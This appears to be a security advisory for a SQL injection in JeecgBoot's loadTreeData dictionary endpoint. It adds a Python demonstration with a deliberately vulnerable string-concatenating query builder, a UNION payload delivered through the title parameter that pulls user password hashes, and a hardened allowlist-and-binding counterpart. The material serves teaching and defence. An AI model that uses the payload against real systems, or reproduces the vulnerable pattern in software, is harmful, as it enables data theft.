CVSS Score
The vulnerability is in the handler for /sys/dict/loadTreeData, which maps to the loadTreeData method. The fixing commit adds a dictQueryBlackListHandler.isPass() check on the dictCode string that the method constructs, which shows that the earlier implementation passed that value on without validating it. The SQL injection arises because the user-controlled parameters tbname, text, code and condition are concatenated into the SQL statement rather than bound as parameters; the request's title parameter is the value that becomes the text variable on the vulnerable path.
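To make the concatenation pattern concrete, here is an added example that is not JeecgBoot's code: a hypothetical reconstruction in Python against an in-memory SQLite database (JeecgBoot itself is Java and MyBatis, so the statement shape, the sample tables sys_depart and sys_user, and the function names are all assumptions). The vulnerable builder concatenates tbname, text, code and condition as the advisory describes, and a payload delivered through the title parameter (the text variable) turns a department lookup into a UNION that reads the user table. The hardened builder substitutes an identifier pattern plus a table allowlist and binds the filter value, rather than the blacklist check the actual fix added, because an allowlist is the stronger choice when the caller controls identifiers.

```python
import re
import sqlite3

# Constructed sample schema for the demonstration; not JeecgBoot's real tables.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sys_depart (id TEXT, depart_name TEXT, parent_id TEXT);
        INSERT INTO sys_depart VALUES ('1', 'Sales', '0'), ('2', 'Ops', '0');
        CREATE TABLE sys_user (id TEXT, username TEXT, password TEXT);
        INSERT INTO sys_user VALUES ('u1', 'admin', '$2a$10$hash');
    """)
    return conn

def build_vulnerable_sql(tbname, text, code, condition=""):
    """Hypothetical reconstruction of the pattern the advisory describes:
    table, display column, value column and filter all land in the
    statement as raw strings."""
    sql = f"SELECT {code} AS value, {text} AS title FROM {tbname}"
    if condition:
        sql += f" WHERE {condition}"
    return sql

# Identifiers must be a plain SQL name; no spaces, quotes or punctuation.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# Only `column = 'literal'` is accepted as a filter; the literal is bound.
SIMPLE_EQ = re.compile(r"\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*'([^']*)'\s*")

def build_hardened_sql(tbname, text, code, condition, allowed_tables):
    """Hardened counterpart (assumed design, not the project's fix): strict
    identifier pattern, table allowlist, and a bound filter value."""
    for ident in (tbname, text, code):
        if not IDENT.fullmatch(ident):
            raise ValueError(f"rejected identifier: {ident!r}")
    if tbname not in allowed_tables:
        raise ValueError(f"table not allowed: {tbname!r}")
    sql = f"SELECT {code} AS value, {text} AS title FROM {tbname}"
    params = ()
    if condition:
        m = SIMPLE_EQ.fullmatch(condition)
        if not m:
            raise ValueError(f"rejected condition: {condition!r}")
        sql += f" WHERE {m.group(1)} = ?"
        params = (m.group(2),)
    return sql, params

# Constructed payload for the request's `title` parameter, which the advisory
# says becomes the `text` variable. The trailing `--` comments out the rest
# of the concatenated statement.
PAYLOAD = "depart_name FROM sys_depart UNION SELECT username, password FROM sys_user --"

def run_vulnerable(text=PAYLOAD):
    conn = make_db()
    sql = build_vulnerable_sql("sys_depart", text, "id")
    return sorted(conn.execute(sql).fetchall())

def run_hardened(text="depart_name", condition="parent_id = '0'"):
    conn = make_db()
    sql, params = build_hardened_sql("sys_depart", text, "id", condition, {"sys_depart"})
    return sorted(conn.execute(sql, params).fetchall())

def hardened_rejects(text=PAYLOAD):
    try:
        build_hardened_sql("sys_depart", text, "id", "", {"sys_depart"})
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(run_vulnerable())   # the sys_user row appears alongside the departments
    print(run_hardened())
    print(hardened_rejects())
```

The point to check in a real fix is the condition parameter: it is a SQL fragment by design, so a blacklist of keywords can only ever be a partial defence, and restricting it to a fixed grammar with bound values (as the hardened builder does) is what actually closes the injection.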
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| org.jeecgframework.boot:jeecg-boot-common | maven | < 3.5.3 | 3.5.3 |